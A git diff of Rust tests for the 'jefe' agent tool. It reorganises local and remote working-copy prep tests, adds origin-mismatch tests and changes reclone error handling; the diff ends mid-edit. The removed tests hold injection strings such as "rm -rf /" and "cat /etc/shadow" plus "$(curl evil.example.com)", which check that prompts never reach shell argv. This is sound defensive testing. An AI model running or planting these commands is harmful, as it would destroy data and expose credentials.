-// exercise both paths, including adversarial content that must never appear
-// in any shell argv.
+// `.jefe/pr-prompt.md` to the local filesystem. These tests exercise the
+// local path, including adversarial content that must never appear in any
+// shell argv. The remote-host path is covered in `issue_prep_remote_tests.rs`.
 
 /// Relative path for the PR prompt — must match `prs_orchestration`.
 const PR_PROMPT_RELATIVE_PATH: &str = ".jefe/pr-prompt.md";

--- a/src/app_input/issue_prep_tests.rs
+++ b/src/app_input/issue_prep_tests.rs
@@ -1,10 +1,13 @@
-//! Tests for target-aware working-copy preparation (split from `issue_prep.rs`).
+//! Tests for local working-copy preparation (split from `issue_prep.rs`).
 //!
-//! These tests exercise:
-//! - `WorkTarget` resolution (local vs remote),
-//! - the pure `RemotePrepPlanner` (command planning without execution),
-//! - local integration with real temp git repos (clean prep, dirty Stop/
-//!   Discard, owned-metadata ignored, clone-when-missing).
+//! These tests exercise local integration with real temp git repos (clean
+//! prep, dirty Stop/Discard, owned-metadata ignored, clone-when-missing),
+//! local origin-mismatch detection, and the LOCAL PR-prompt /
+//! path-traversal safety tests.
+//!
+//! The remote SSH planner tests (`WorkTarget` resolution,
+//! `RemotePrepPlanner` command planning, remote PR prompt) live in
+//! `issue_prep_remote_tests.rs`.
 
 use super::ensure_workdir_cloned;
 use super::*;
@@ -12,8 +15,6 @@ use crate::app_input::issue_git_prep;
 
 use std::path::{Path, PathBuf};
 use std::process::Command;
-
-use jefe::domain::RemoteRepositorySettings;
 
 trait TestResultExt<T> {
     fn value_or_panic(self, context: &str) -> T;
@@ -47,297 +48,6 @@ impl<T> TestOptionExt<T> for Option<T> {
             None => panic!("{context}: expected Some, got None"),
         }
     }
-}
-
-/// Standard work dir used by the planner tests.
-const PLAN_WORK_DIR: &str = "/home/acoliver/work";
-
-fn remote_settings() -> RemoteRepositorySettings {
-    RemoteRepositorySettings {
-        enabled: true,
-        login_user: "ubuntu".to_owned(),
-        host: "build.example.com".to_owned(),
-        run_as_user: "acoliver".to_owned(),
-        setup_env_default: false,
-    }
-}
-
-fn identity() -> CloneIdentity {
-    CloneIdentity::parse("acme/widgets").value_or_panic("test fixture identity")
-}
-
-// ── WorkTarget resolution ──────────────────────────────────────────
-
-#[test]
-fn local_target_when_remote_disabled() {
-    let remote = RemoteRepositorySettings::default();
-    assert_eq!(WorkTarget::from_remote(&remote), WorkTarget::Local);
-}
-
-#[test]
-fn remote_target_when_enabled() {
-    let remote = remote_settings();
-    assert!(matches!(
-        WorkTarget::from_remote(&remote),
-        WorkTarget::Remote(_)
-    ));
-}
-
-#[test]
-fn local_target_when_enabled_but_host_missing() {
-    let remote = RemoteRepositorySettings {
-        enabled: true,
-        login_user: "ubuntu".to_owned(),
-        host: String::new(),
-        run_as_user: String::new(),
-        setup_env_default: false,
-    };
-    assert_eq!(WorkTarget::from_remote(&remote), WorkTarget::Local);
-}
-
-// ── RemotePrepPlanner: command planning ────────────────────────────
-
-#[test]
-fn plan_uses_ssh_t_not_tt() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "do the work",
-    });
-    assert!(!ops.is_empty());
-    for op in &ops {
-        assert!(
-            op.ssh_argv.iter().any(|a| a == "-T"),
-            "every remote op must use -T (got {:?})",
-            op.ssh_argv
-        );
-        assert!(
-            !op.ssh_argv.iter().any(|a| a == "-tt"),
-            "no remote prep op may use -tt (got {:?})",
-            op.ssh_argv
-        );
-    }
-}
-
-#[test]
-fn plan_targets_remote_host_user() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "do the work",
-    });
-    assert!(!ops.is_empty());
-    for op in &ops {
-        assert!(
-            op.ssh_argv.iter().any(|a| a == "ubuntu@build.example.com"),
-            "every op must target ubuntu@build.example.com (got {:?})",
-            op.ssh_argv
-        );
-    }
-}
-
-#[test]
-fn plan_applies_run_as_user() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "do the work",
-    });
-    // run_as_user=acoliver differs from login_user=ubuntu → every command
-    // is wrapped in `sudo -n su - acoliver -c`.
-    for op in &ops {
-        let cmd = op
-            .ssh_argv
-            .iter()
-            .find(|a| a.contains("sudo"))
-            .unwrap_or_else(|| {
-                panic!(
-                    "run_as_user must wrap command in sudo -n su - acoliver (got {:?})",
-                    op.ssh_argv
-                )
-            });
-        assert!(cmd.contains("acoliver"), "wrapped command: {cmd}");
-    }
-}
-
-#[test]
-fn plan_prompt_transferred_via_stdin_not_shell() {
-    let adversarial = "'; rm -rf /; echo '";
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: adversarial,
-    });
-    // The final op writes the prompt via stdin.
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
-    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
-    // The command string must NOT contain the raw adversarial prompt —
-    // it is transferred via stdin, not interpolated.
-    for arg in &prompt_op.ssh_argv {
-        assert!(
-            !arg.contains("rm -rf"),
-            "adversarial prompt must not appear in shell argv (got {arg})"
-        );
-    }
-}
-
-#[test]
-fn plan_does_not_create_local_workdir() {
-    // The planner is pure: it must never touch the local filesystem.
-    // Verify by pointing at a non-existent local path and checking no
-    // directory was created.
-    let local_marker = PathBuf::from(env!("CARGO_MANIFEST_DIR"))
-        .join("target/tmp/issue_prep_should_not_create_this");
-    let _ = std::fs::remove_dir_all(&local_marker);
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let _ops = planner.plan(&PlanInputs {
-        work_dir: &local_marker,
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "prompt",
-    });
-    assert!(
-        !local_marker.exists(),
-        "remote planner must not create local directories"
-    );
-}
-
-#[test]
-fn plan_dirty_stop_emits_no_cleanup() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: true,
-        prompt: "prompt",
-    });
-    // Dirty + Stop: no reset/clean, no checkout, no prompt write.
-    assert!(
-        ops.iter().all(|op| !op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains("git reset") || a.contains("git clean"))),
-        "Stop policy must not plan reset/clean: {ops:?}"
-    );
-}
-
-#[test]
-fn plan_dirty_discard_emits_cleanup_then_prep() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Discard,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: true,
-        prompt: "prompt",
-    });
-    // Discard: reset --hard + clean -fd first, then checkout, then prompt.
-    let reset_idx = ops
-        .iter()
-        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git reset")))
-        .value_or_panic("a reset op must be planned");
-    let checkout_idx = ops
-        .iter()
-        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git checkout")))
-        .value_or_panic("a checkout op must be planned");
-    let prompt_idx = ops
-        .iter()
-        .position(|op| op.stdin_prompt.is_some())
-        .value_or_panic("a prompt-write op must be planned");
-    assert!(reset_idx < checkout_idx, "reset before checkout");
-    assert!(checkout_idx < prompt_idx, "checkout before prompt write");
-}
-
-#[test]
-fn plan_clone_when_missing() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: false,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "prompt",
-    });
-    assert!(
-        ops.iter()
-            .any(|op| op.ssh_argv.iter().any(|a| a.contains("git clone"))),
-        "missing worktree must plan a clone: {ops:?}"
-    );
-    // Clone uses the canonical HTTPS URL.
-    assert!(
-        ops.iter().any(|op| op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains("https://github.com/acme/widgets.git"))),
-        "clone must use canonical HTTPS URL: {ops:?}"
-    );
-}
-
-#[test]
-fn plan_https_url_regardless_of_remote_enabled() {
-    // Remote is enabled but clone URL must still be HTTPS (no SSH
-    // inference from remote.enabled).
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: false,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "prompt",
-    });
-    let clone_op = ops
-        .iter()
-        .find(|op| op.ssh_argv.iter().any(|a| a.contains("git clone")))
-        .unwrap_or_else(|| panic!("expected a clone op: {ops:?}"));
-    assert!(
-        clone_op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains("https://github.com/")),
-        "clone must use HTTPS even when remote enabled: {clone_op:?}"
-    );
-    assert!(
-        clone_op
-            .ssh_argv
-            .iter()
-            .all(|a| !a.contains("git@github.com")),
-        "clone must not use SSH form: {clone_op:?}"
-    );
 }
 
 // ── Local integration tests with real temp repos ───────────────────
@@ -681,6 +391,86 @@ fn local_clone_when_missing_with_url() {
     cleanup(&work);
 }
 
+// ── Origin-mismatch detection (issue #190) ───────────────────────────
+
+/// Create a CloneIdentity whose owner/repo differs from the origin's
+/// owner/repo. The bare origin repos are created under a temp path; the
+/// identity uses a synthetic "other/repo" that will never match.
+fn mismatched_identity() -> CloneIdentity {
+    CloneIdentity::parse("other/repo").value_or_panic("parse other/repo")
+}
+
+#[test]
+fn local_origin_mismatch_detected() {
+    let origin = bare_origin_with_commit("mismatch");
+    let work = clone_origin(&origin, "mismatch");
+    // Write a file to prove the workdir is untouched after mismatch.
+    std::fs::write(work.join("marker.txt"), "untouched").value_or_panic("write marker");
+
+    let identity = mismatched_identity();
+    let outcome = prepare_local(&work, Some(&identity), DirtyPolicy::Stop, "prompt")
+        .value_or_panic("prepare_local");
+    assert!(
+        matches!(outcome, PrepOutcome::OriginMismatch { .. }),
+        "mismatched origin must return OriginMismatch, got {outcome:?}"
+    );
+
+    // Workdir is untouched — no checkout/pull ran, marker is preserved.
+    assert_eq!(
+        std::fs::read_to_string(work.join("marker.txt")).value_or_panic("read marker"),
+        "untouched"
+    );
+    // No prompt written (mismatch aborts before prompt write).
+    assert!(!work.join(".jefe/issue-prompt.md").exists());
+
+    cleanup(origin.parent().unwrap_or(&origin));
+    cleanup(&work);
+}
+
+#[test]
+fn local_origin_match_proceeds_ready() {
+    // When identity is None, no origin check runs and an existing clean repo
+    // proceeds to Ready. This is the regression-safe path (issue #166).
+    let origin = bare_origin_with_commit("match");
+    let work = clone_origin(&origin, "match");
+
+    let outcome =
+        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    assert_eq!(
+        outcome,
+        PrepOutcome::Ready,
+        "no identity + existing repo must be Ready (regression-safe)"
+    );
+
+    cleanup(origin.parent().unwrap_or(&origin));
+    cleanup(&work);
+}
+
+#[test]
+fn local_force_reclone_replaces_mismatched_repo() {
+    let origin = bare_origin_with_commit("reclone");
+    let work = clone_origin(&origin, "reclone");
+    let clone_url = origin.to_string_lossy().into_owned();
+    // Write a marker to prove the workdir is replaced.
+    std::fs::write(work.join("old-marker.txt"), "old").value_or_panic("write old marker");
+
+    // Exercise the PRODUCTION force-reclone sequence directly. Since
+    // CloneIdentity forces HTTPS (unusable for local bare repos), we enter
+    // via the resolved-URL seam that prepare_local_force_reclone delegates to
+    // after resolving the identity. This proves the real remove → clone →
+    // prep ordering runs and replaces the mismatched workdir.
+    force_reclone_local_with_url(&work, &clone_url, "prompt")
+        .value_or_panic("force_reclone_local_with_url");
+
+    // Old marker is gone (workdir was replaced).
+    assert!(!work.join("old-marker.txt").exists());
+    // Prompt is written.
+    assert!(work.join(".jefe/issue-prompt.md").exists());
+
+    cleanup(origin.parent().unwrap_or(&origin));
+    cleanup(&work);
+}
+
 // ── Target-aware PR prompt writing (reuses write_prompt_to_target) ──────
 //
 // The PR send path (`prs_orchestration::dispatch_pr_agent_chooser_confirm`)
@@ -725,85 +515,6 @@ fn pr_prompt_local_write_writes_exact_content_with_adversarial_chars() {
         "adversarial content must not create files"
     );
     cleanup(&work_dir);
-}
-
-/// A remote PR prompt write plans `ssh -T` with prompt bytes via stdin,
-/// transferring adversarial content WITHOUT it appearing in the shell argv.
-/// This uses the pure `RemotePrepPlanner` so no SSH connection is made — it
-/// records the planned operation.
-#[test]
-fn pr_prompt_remote_plan_transfers_prompt_via_stdin_not_shell() {
-    let adversarial = "'; cat /etc/shadow; echo '\n$(curl evil.example.com)";
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: adversarial,
-    });
-    // The final op writes the prompt via stdin.
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
-    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
-    // The command argv must NOT contain the raw adversarial prompt.
-    for arg in &prompt_op.ssh_argv {
-        assert!(
-            !arg.contains("/etc/shadow"),
-            "adversarial prompt must not appear in shell argv (got {arg})"
-        );
-        assert!(
-            !arg.contains("evil.example.com"),
-            "adversarial URL must not appear in shell argv (got {arg})"
-        );
-    }
-    // The prompt file path in the argv must be the issue prompt path (the
-    // planner hardcodes it); the PR path uses `write_prompt_to_target`
-    // directly at runtime.
-    assert!(
-        prompt_op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains(".jefe/issue-prompt.md")),
-        "planned prompt op writes to .jefe/issue-prompt.md"
-    );
-}
-
-/// The remote PR prompt write (via `write_prompt_to_target`) delegates to the
-/// same `RemotePrepRunner::write_prompt` that the issue path uses. Since the
-/// runner is not exposed for direct testing, this verifies the planner's
-/// generic prompt-write op uses `ssh -T` and targets the correct host.
-#[test]
-fn pr_prompt_remote_target_is_correct_ssh_t_host() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: None,
-        policy: DirtyPolicy::Stop,
-        exists_is_git: true,
-        exists_not_git: false,
-        is_dirty: false,
-        prompt: "PR prompt",
-    });
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("prompt op must exist: {ops:?}"));
-    assert!(
-        prompt_op.ssh_argv.iter().any(|a| a == "-T"),
-        "PR prompt remote op must use -T"
-    );
-    assert!(
-        prompt_op
-            .ssh_argv
-            .iter()
-            .any(|a| a == "ubuntu@build.example.com"),
-        "PR prompt remote op must target ubuntu@build.example.com"
-    );
 }
 
 /// Local PR prompt write creates the `.jefe` directory when absent.

--- a/src/app_input/issue_send_modal_tests.rs
+++ b/src/app_input/issue_send_modal_tests.rs
@@ -1,0 +1,326 @@
+//! Issue send-to-agent tests: launch-signature overrides (#166), validated
+//! clone identity (#184), and the origin-mismatch / dirty-copy confirm modals
+//! (#190).
+//!
+//! Split from `app_input_tests.rs` to keep that file under the 1000-line
+//! source-file limit. Shared fixtures (`sample_signature`, `sample_agent`,
+//! `TestResultExt`, `TestOptionExt`) come from the sibling `tests` module via
+//! `super::tests`.
+
+use super::tests::{TestOptionExt, sample_agent, sample_signature};
+use super::*;
+
+use std::path::PathBuf;
+
+use super::issues_send::{issue_send_info_from_state, prepare_issue_launch_signature};
+use jefe::domain::{AgentId, IssueDetail, IssueState, RepositoryId};
+use jefe::state::{AgentChooserState, ScreenMode};
+
+// ── Issue send-to-agent: default-branch prep + dirty-copy guard (issue #166) ─
+
+/// Build an AppState for the issue agent-chooser send path: an open chooser +
+/// issue detail + an agent (with `pass_continue = true`) whose work_dir is a
+/// temp dir. Mirrors `state_for_pr_agent_chooser_confirm`.
+fn state_for_issue_agent_chooser_send(
+    agent_id: &AgentId,
+    work_dir: &std::path::Path,
+) -> jefe::state::AppState {
+    let mut agent = sample_agent(agent_id);
+    agent.work_dir = work_dir.to_path_buf();
+    // sample_agent uses Agent::new which defaults pass_continue = true.
+    assert!(
+        agent.pass_continue,
+        "test fixture: agent must default to pass_continue = true"
+    );
+
+    let detail = IssueDetail {
+        repo_owner_name: "owner/repo".to_owned(),
+        number: 166,
+        title: "Issue send should checkout+pull main".to_owned(),
+        state: IssueState::Open,
+        author_login: "reporter".to_owned(),
+        created_at: "2024-01-01T00:00:00Z".to_owned(),
+        updated_at: "2024-01-02T00:00:00Z".to_owned(),
+        labels: vec![],
+        assignees: vec![],
+        milestone: None,
+        body: "Send to Agent".to_owned(),
+        external_url: "https://github.com/owner/repo/issues/166".to_owned(),
+        comments: vec![],
+        has_more_comments: false,
+        comments_cursor: None,
+    };
+
+    let issues_state = jefe::state::IssuesState {
+        active: true,
+        issue_detail: Some(detail),
+        agent_chooser: Some(AgentChooserState {
+            selected_index: 0,
+            agents: vec![(agent_id.clone(), String::from("Agent One"))],
+        }),
+        ..jefe::state::IssuesState::default()
+    };
+
+    let mut state = jefe::state::AppState {
+        screen_mode: ScreenMode::DashboardIssues,
+        issues_state,
+        ..AppState::default()
+    };
+    state.agents.push(agent);
+    state.repositories.push(jefe::domain::Repository::new(
+        RepositoryId(String::from("repo-1")),
+        String::from("Repo 1"),
+        String::from("owner/repo"),
+        PathBuf::from("/tmp/repo1"),
+    ));
+    state.selected_repository_index = Some(0);
+    state
+}
+
+/// The issue-driven launch path must force `pass_continue = false` on the
+/// constructed launch signature, even though the agent's configured
+/// `pass_continue` defaults to `true`. This test resolves the send info
+/// (which copies the agent's `pass_continue`) and then applies the SAME
+/// override `dispatch_agent_chooser_confirm` applies, asserting `--continue`
+/// would never reach the agent. The git prep + spawn require a runtime/git
+/// repo and are guarded out in unit tests (SharedContext is None).
+#[test]
+fn issue_send_forces_pass_continue_false_on_launch_signature() {
+    let agent_id = AgentId(String::from("issue-agent-1"));
+    // This test only exercises pure struct transforms — the work_dir is
+    // never materialized on disk — so a static path suffices.
+    let work_dir = std::path::PathBuf::from("/tmp/jefe-issue-send-test");
+    let state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+
+    let send_info = issue_send_info_from_state(&state)
+        .unwrap_or_else(|| panic!("issue_send_info must resolve with chooser + detail + agent"));
+
+    // The send info copies the agent's configured pass_continue (true).
+    assert!(
+        send_info.signature.pass_continue,
+        "send info should inherit the agent's pass_continue = true"
+    );
+
+    // dispatch_agent_chooser_confirm forces pass_continue = false before launch.
+    // This calls the REAL production helper so removing the override would
+    // cause this test to fail.
+    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    assert!(
+        !launch_sig.pass_continue,
+        "issue-driven launches must force pass_continue = false"
+    );
+    assert!(
+        launch_sig
+            .mode_flags
+            .iter()
+            .any(|flag| flag.contains(".jefe/issue-prompt.md")),
+        "issue launch signature must include the issue prompt instruction"
+    );
+}
+
+#[test]
+fn code_puppy_issue_send_carries_kind_and_uses_positional_instruction() {
+    let agent_id = AgentId(String::from("code-puppy-issue-agent"));
+    let work_dir = std::path::PathBuf::from("/tmp/jefe-code-puppy-issue-send");
+    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+    let Some(agent) = state.agents.iter_mut().find(|agent| agent.id == agent_id) else {
+        panic!("fixture agent should exist");
+    };
+    agent.agent_kind = jefe::domain::AgentKind::CodePuppy;
+
+    let send_info = issue_send_info_from_state(&state)
+        .unwrap_or_else(|| panic!("CodePuppy issue send info should resolve"));
+    assert_eq!(
+        send_info.signature.agent_kind,
+        jefe::domain::AgentKind::CodePuppy
+    );
+
+    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    assert!(!launch_sig.pass_continue);
+    assert!(!launch_sig.mode_flags.iter().any(|arg| arg == "-i"));
+    assert!(
+        launch_sig
+            .mode_flags
+            .iter()
+            .any(|arg| arg.contains(".jefe/issue-prompt.md"))
+    );
+}
+
+/// The `ConfirmIssueDirtyCopy` modal must resolve to `InputMode::Confirm` so
+/// the confirm key handler routes Enter/Esc/n correctly.
+#[test]
+fn confirm_issue_dirty_copy_modal_routes_to_confirm_input_mode() {
+    use jefe::input::input_mode_for_state;
+
+    let state = AppState {
+        modal: ModalState::ConfirmIssueDirtyCopy {
+            agent_id: AgentId(String::from("a1")),
+            work_dir: PathBuf::from("/tmp/x"),
+            signature: sample_signature(),
+            payload: jefe::github::SendPayload::default(),
+        },
+        ..AppState::default()
+    };
+
+    assert_eq!(
+        input_mode_for_state(&state),
+        jefe::input::InputMode::Confirm,
+        "ConfirmIssueDirtyCopy must use InputMode::Confirm"
+    );
+}
+
+/// The `ConfirmIssueOriginMismatch` modal must resolve to `InputMode::Confirm`
+/// so the confirm key handler routes Enter/Esc/n correctly.
+#[test]
+fn confirm_issue_origin_mismatch_modal_routes_to_confirm_input_mode() {
+    use jefe::input::input_mode_for_state;
+
+    let state = AppState {
+        modal: ModalState::ConfirmIssueOriginMismatch {
+            agent_id: AgentId(String::from("a1")),
+            work_dir: PathBuf::from("/tmp/x"),
+            signature: sample_signature(),
+            payload: jefe::github::SendPayload::default(),
+            actual: String::from("other/repo"),
+            expected: String::from("acme/widgets"),
+        },
+        ..AppState::default()
+    };
+
+    assert_eq!(
+        input_mode_for_state(&state),
+        jefe::input::InputMode::Confirm,
+        "ConfirmIssueOriginMismatch must use InputMode::Confirm"
+    );
+}
+
+/// Esc/n on the `ConfirmIssueOriginMismatch` modal dispatch `CloseModal`,
+/// which must clear the modal non-destructively (no reclone, no launch).
+/// This verifies the default-halt contract: the mismatched workdir is left
+/// untouched unless the user explicitly presses Enter.
+#[test]
+fn close_modal_dismisses_origin_mismatch_non_destructively() {
+    use jefe::state::AppEvent;
+
+    let state = AppState {
+        modal: ModalState::ConfirmIssueOriginMismatch {
+            agent_id: AgentId(String::from("a1")),
+            work_dir: PathBuf::from("/tmp/x"),
+            signature: sample_signature(),
+            payload: jefe::github::SendPayload::default(),
+            actual: String::from("other/repo"),
+            expected: String::from("acme/widgets"),
+        },
+        ..AppState::default()
+    };
+
+    let next = state.apply(AppEvent::CloseModal);
+    assert_eq!(
+        next.modal,
+        ModalState::None,
+        "CloseModal must dismiss ConfirmIssueOriginMismatch without side effects"
+    );
+}
+
+// ── Issue #184: validated clone identity in issue-send info ─────────────
+
+/// Issue-send info must carry a valid clone identity ONLY when
+/// `github_repo` is a valid `owner/repo`, and NEVER fall back to `slug`.
+#[test]
+fn issue_send_info_carries_valid_clone_identity_only() {
+    let agent_id = AgentId(String::from("issue-valid-id"));
+    let work_dir = PathBuf::from("/tmp/jefe-issue-valid-id");
+    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+    // Set a valid github_repo.
+    state.repositories[0].github_repo = "acme/widgets".to_owned();
+
+    let send_info = issue_send_info_from_state(&state)
+        .value_or_panic("issue send info must resolve with a valid github_repo");
+    let identity = send_info
+        .clone_identity
+        .as_ref()
+        .value_or_panic("a valid github_repo must yield a clone identity");
+    assert_eq!(identity.clone_url(), "https://github.com/acme/widgets.git");
+}
+
+/// When `github_repo` is empty but `slug` is set, issue-send info must NOT
+/// carry a clone identity (no fallback to slug).
+#[test]
+fn issue_send_info_no_clone_identity_when_github_repo_empty() {
+    let agent_id = AgentId(String::from("issue-no-id"));
+    let work_dir = PathBuf::from("/tmp/jefe-issue-no-id");
+    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+    // slug is "owner/repo" (set by the fixture) but github_repo is empty.
+    state.repositories[0].github_repo = String::new();
+    assert!(
+        !state.repositories[0].slug.is_empty(),
+        "fixture: slug must be non-empty to prove no fallback"
+    );
+
+    let send_info =
+        issue_send_info_from_state(&state).value_or_panic("issue send info must still resolve");
+    assert!(
+        send_info.clone_identity.is_none(),
+        "no clone identity when github_repo is empty (must not fall back to slug)"
+    );
+}
+
+/// When `github_repo` is a URL (invalid), issue-send info must NOT carry a
+/// clone identity, even though slug looks valid.
+#[test]
+fn issue_send_info_no_clone_identity_for_url_shaped_github_repo() {
+    let agent_id = AgentId(String::from("issue-url-id"));
+    let work_dir = PathBuf::from("/tmp/jefe-issue-url-id");
+    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+    state.repositories[0].github_repo = "https://github.com/acme/widgets".to_owned();
+
+    let send_info =
+        issue_send_info_from_state(&state).value_or_panic("issue send info must still resolve");
+    assert!(
+        send_info.clone_identity.is_none(),
+        "URL-shaped github_repo must not yield a clone identity"
+    );
+}
+
+/// CodePuppy issue send uses the SAME prep path (identical launch signature
+/// structure) and a fresh no-resume signature. This proves CodePuppy and
+/// LLxprt share identical prep; only the runtime args differ.
+#[test]
+fn code_puppy_issue_uses_identical_prep_and_fresh_no_resume_signature() {
+    let agent_id = AgentId(String::from("cp-identical-prep"));
+    let work_dir = PathBuf::from("/tmp/jefe-cp-identical-prep");
+    let mut state = state_for_issue_agent_chooser_send(&agent_id, &work_dir);
+    state.repositories[0].github_repo = "acme/widgets".to_owned();
+    if let Some(agent) = state.agents.iter_mut().find(|a| a.id == agent_id) {
+        agent.agent_kind = jefe::domain::AgentKind::CodePuppy;
+    }
+
+    let send_info =
+        issue_send_info_from_state(&state).value_or_panic("CodePuppy issue send info must resolve");
+
+    // Same validated clone identity as LLxprt would get (identical prep).
+    let identity = send_info
+        .clone_identity
+        .as_ref()
+        .value_or_panic("CodePuppy must carry the same validated clone identity");
+    assert_eq!(identity.clone_url(), "https://github.com/acme/widgets.git");
+
+    // Fresh no-resume signature: pass_continue forced off, positional
+    // instruction (no -i).
+    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    assert!(
+        !launch_sig.pass_continue,
+        "CodePuppy issue send must be fresh (no resume)"
+    );
+    assert!(
+        !launch_sig.mode_flags.iter().any(|arg| arg == "-i"),
+        "CodePuppy must not receive -i (runtime prepends it)"
+    );
+    assert!(
+        launch_sig
+            .mode_flags
+            .iter()
+            .any(|arg| arg.contains(".jefe/issue-prompt.md")),
+        "CodePuppy issue signature must reference the issue prompt"
+    );
+}

--- a/src/app_input/issue_send_modal_tests.rs
+++ b/src/app_input/issue_send_modal_tests.rs
@@ -202,6 +202,17 @@ fn confirm_issue_origin_mismatch_modal_routes_to_confirm_input_mode() {
 fn close_modal_dismisses_origin_mismatch_non_destructively() {
     use jefe::state::AppEvent;
 
+    // Seed non-modal state so we can prove CloseModal leaves it untouched.
+    let seeded = AppState {
+        repositories: vec![jefe::domain::Repository::new(
+            jefe::domain::RepositoryId("r1".to_owned()),
+            "Repo".to_owned(),
+            "acme/widgets".to_owned(),
+            PathBuf::from("/tmp/repo"),
+        )],
+        screen_mode: jefe::state::ScreenMode::DashboardIssues,
+        ..AppState::default()
+    };
     let state = AppState {
         modal: ModalState::ConfirmIssueOriginMismatch {
             agent_id: AgentId(String::from("a1")),
@@ -211,6 +222,8 @@ fn close_modal_dismisses_origin_mismatch_non_destructively() {
             actual: String::from("other/repo"),
             expected: String::from("acme/widgets"),
         },
+        repositories: seeded.repositories.clone(),
+        screen_mode: seeded.screen_mode,
         ..AppState::default()
     };
 
@@ -219,6 +232,18 @@ fn close_modal_dismisses_origin_mismatch_non_destructively() {
         next.modal,
         ModalState::None,
         "CloseModal must dismiss ConfirmIssueOriginMismatch without side effects"
+    );
+    // Non-modal state is preserved: CloseModal is a pure transition that
+    // only touches `modal`, never agents/repositories/screen_mode.
+    assert_eq!(next.repositories.len(), 1, "repositories must be preserved");
+    assert_eq!(
+        next.screen_mode,
+        jefe::state::ScreenMode::DashboardIssues,
+        "screen_mode must be preserved"
+    );
+    assert!(
+        next.agents.is_empty(),
+        "agents must be untouched (no launch fired)"
     );
 }
 

--- a/src/app_input/issues_send.rs
+++ b/src/app_input/issues_send.rs
@@ -388,16 +388,19 @@ pub(super) fn confirm_issue_origin_mismatch_enter(
             "Working copy is dirty after force-reclone".to_owned(),
         ),
         Ok(PrepOutcome::OriginMismatch { actual, expected }) => {
-            prompt_origin_mismatch_confirm(
+            // A force-reclone clones from the validated configured identity,
+            // so an OriginMismatch here is an unexpected error (the clone did
+            // not land on the configured origin), NOT a re-prompt. Re-opening
+            // the modal could loop indefinitely, so fail hard with a clear
+            // message instead.
+            apply_send_to_agent_failed(
                 app_state,
                 ctx,
-                &PrepOutcomeContext {
-                    agent_id,
-                    work_dir,
-                    launch_sig,
-                    payload,
-                },
-                OriginMismatchInfo { actual, expected },
+                format!(
+                    "Force-reclone completed but the working copy origin is {actual}, expected \
+                     {expected}. This should not happen after a fresh clone; please verify the \
